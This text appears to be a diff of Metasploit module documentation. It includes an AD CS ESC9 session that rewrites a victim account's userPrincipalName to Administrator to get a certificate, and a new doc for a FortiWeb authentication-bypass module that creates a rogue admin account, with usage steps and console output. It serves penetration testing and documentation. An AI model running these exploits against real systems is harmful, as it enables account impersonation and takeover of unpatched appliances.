+   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
+   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
+   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
+   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   445              no        The target port (TCP)
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName:
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
+[*] 172.16.199.200:445 - Reverting ldap object
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
+```
+
 ### ESC9 - Update dnsHostName to `dc2.kerberos.issue`
 ```
 msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
@@ -11,11 +11,11 @@ This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, whi

 ## Options

-  **USERNAME**
+### USERNAME

  The username of the new administrator account. Defaults to a random string.

-  **PASSWORD**
+### PASSWORD

  The password of the new administrator account. Defaults to a random string.

@@ -39,4 +39,4 @@ msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
 [+] Account test_user/test_password created successfully.
 [*] Auxiliary module execution completed
 msf auxiliary(admin/hp/hp_ilo_create_admin_account) > 
-```
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet
+FortiWeb management interface to create a new local administrator user account. This vulnerability affects the
+following versions:
+
+* FortiWeb `8.0.0` through `8.0.1` (Patched in `8.0.2` and above).
+* FortiWeb `7.6.0` through `7.6.4` (Patched in `7.6.5` and above).
+* FortiWeb `7.4.0` through `7.4.9` (Patched in `7.4.10` and above).
+* FortiWeb `7.2.0` through `7.2.11` (Patched in `7.2.12` and above).
+* FortiWeb `7.0.0` through `7.0.11` (Patched in `7.0.12` and above).
+
+## Testing
+Download a suitable FortiWeb-VM image and create a new VM. When creating the VM, assign the first network interface to a
+network you can target later (e.g. your external network), optionally, assign the second network interface to a private
+network. Power on the VM, and login to the console with the default username `admin` and a blank password. You will be
+asked to create a new admin password. Once you are at the CLI, you can assign an IP address to the management
+interface (on `port1`) for your (external) network:
+
+```
+FortiWeb # config system interface 
+
+FortiWeb (interface) # edit port1 
+
+FortiWeb (port1) # set ip 192.168.86.200 255.255.255.0
+
+FortiWeb (port1) # end
+
+FortiWeb #
+```
+
+You should now be able to access the management interface via HTTPS, e.g. `https://192.168.86.200/login`.
+
+## Options
+
+### NEW_USERNAME
+Username to use when creating a new admin account (Defaults to a random value).
+
+### NEW_PASSWORD
+Password to use when creating a new admin account (Defaults to a random value).
+
+## Advanced Options
+
+The following advanced options do not need to be changed against a target in a default configuration.
+
+### FORTIWEB_ACCESS_PROFILE
+The access profile to use for the new admin account (Defaults to `prof_admin`).
+
+### FORTIWEB_DOMAIN
+The domain to use for the new admin account (Defaults to `root`).
+
+### FORTIWEB_DEFAULT_ADMIN_ACCOUNT
+The default FortiWeb admin account name (Defaults to `admin`).
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/admin/http/fortinet_fortiweb_create_admin`
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>` (If different from the default of 443)
+5. `set SSL true` (Or set to false if targeting HTTP)
+
+Configure the new admin account you will create. The module will supply a default random value for these.
+
+6. `set NEW_USERNAME <NEW_ADMIN_NAME>`
+7. `set NEW_PASSWORD <NEW_ADMIN_PASSWORD>`
+
+Run the module:
+
+8. `check`
+9. `run`
+
+Verify you can login using the new admin account you just created:
+
+10. Browse to `https://<TARGET_IP_ADDRESS>:<TARGET_HTTP_OR_HTTPS_PORT>/login` and login using `<NEW_ADMIN_NAME>:<NEW_ADMIN_PASSWORD>`
+
+## Scenarios
+
+### Example 1 (Success against FortiWeb 8.0.1)
+
+```
+msf > use auxiliary/admin/http/fortinet_fortiweb_create_admin 
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.202
+RHOST => 192.168.86.202
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_USERNAME pwn3d
+NEW_USERNAME => pwn3d
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_PASSWORD pwn3d
+NEW_PASSWORD => pwn3d
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
+[*] 192.168.86.202:443 - The target appears to be vulnerable.
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run
+[*] Running module against 192.168.86.202
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] New admin account successfully created: pwn3d:pwn3d
+[+] Login via https://192.168.86.202:443/login
+[*] Auxiliary module execution completed
+```
+
+### Example 2 (Failure against FortiWeb 8.0.2)
+
+```
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.200
+RHOST => 192.168.86.200
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
+[*] 192.168.86.200:443 - The target is not exploitable. Received a 403 Forbidden response
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run autocheck=false
+[*] Running module against 192.168.86.200
+[!] AutoCheck is disabled, proceeding with exploitation
+[-] Auxiliary aborted due to failure: not-vulnerable: Target does not appear vulnerable (403 Forbidden response)
+[*] Auxiliary module execution completed
+```
@@ -23,7 +23,7 @@

 ## Options

-  **rport**
+### rport

  The default is set to `8180`, which is only default on FreeBSD.  All other operating systems, and the software itself, default to `8080`.

@@ -10,11 +10,11 @@ To exploit the vulnerability, the module generates requests and sets a value for

 ## Options

-**PATTERN1** and **PATTERN2**
+### PATTERN1 and PATTERN2

 These patterns are used to determine whether the news articles have been reordered. By default, the module will search for headlines and set the first identified headline to PATTERN1 and the second to PATTERN2.

-**ID**
+### ID

 The value for query parameter `id` of the page that the news extension is running on.

--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				`rootProject.name = 'MetasploitPayloadExtension'`
@@ -1 +1 @@
 .2.5
 .3.8